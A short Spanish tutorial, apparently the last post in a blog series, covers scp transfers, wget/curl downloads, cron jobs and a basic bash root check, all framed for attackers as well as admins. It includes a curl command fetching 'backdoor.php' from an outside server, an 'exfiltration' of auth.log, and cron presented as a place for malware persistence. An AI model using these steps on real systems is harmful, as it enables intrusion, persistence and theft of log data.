La administración manual no escala.
La diferencia entre un usuario y un SysAdmin (o un atacante eficiente) es la capacidad de automatizar tareas y mover datos sigilosamente.
En esta última entrega de la serie inicial 0x03, dominaremos la transferencia y la persistencia.
0x00. Logística de Datos (In/Out)
Necesitas herramientas para subir scripts o bajar logs de evidencia. Recuerda que cambiamos el puerto SSH al 2222 en el post 0x01.
SCP (Secure Copy)
Desde tu máquina local hacia el servidor (Upload):
scp -P 2222 payload.sh usuario@target:/tmp/
Desde el servidor hacia local (Exfiltración/Download):
scp -P 2222 usuario@target:/var/log/auth.log .
Wget & Curl (Living off the Land)
Si estás dentro del servidor y necesitas bajar herramientas desde una URL:
wget -O linpeas.sh https://github.com/.../linpeas.sh
curl -O https://miservidor.com/backdoor.php
0x01. Automatización y Persistencia (Cron)
Cron es el reloj del sistema que ejecuta tareas programadas.
Es el lugar favorito para backups legítimos… y para persistencia de malware.
crontab -e
Sintaxis: m h dom mon dow comando
#Ejemplo: Heartbeat cada minuto
* date >> /home/usuario/latido.txt
#Ejemplo: Backup diario a las 03:30 AM
30 03 * /home/usuario/scripts/backup.sh 2>&1
0x02. Bash Scripting: Ops Code
Un script básico para verificar si somos root antes de ejecutar una acción crítica. Estructura esencial:
#!/bin/bash
# Variables
TARGET="192.168.1.10"
USER=$(whoami)
echo "[*] Iniciando Ops como: $USER"
# Condicional de Privilegios
if [ $(id -u) -eq 0 ]; then
echo "[+] Eres Root. Ejecutando payload..."
# Acciones privilegiadas aquí
else
echo "[-] Acceso denegado. Se requieren privilegios."
exit 1
fi
No olvides dar permisos de ejecución: chmod +x script.sh.
“End of Initial Series”
[EOF]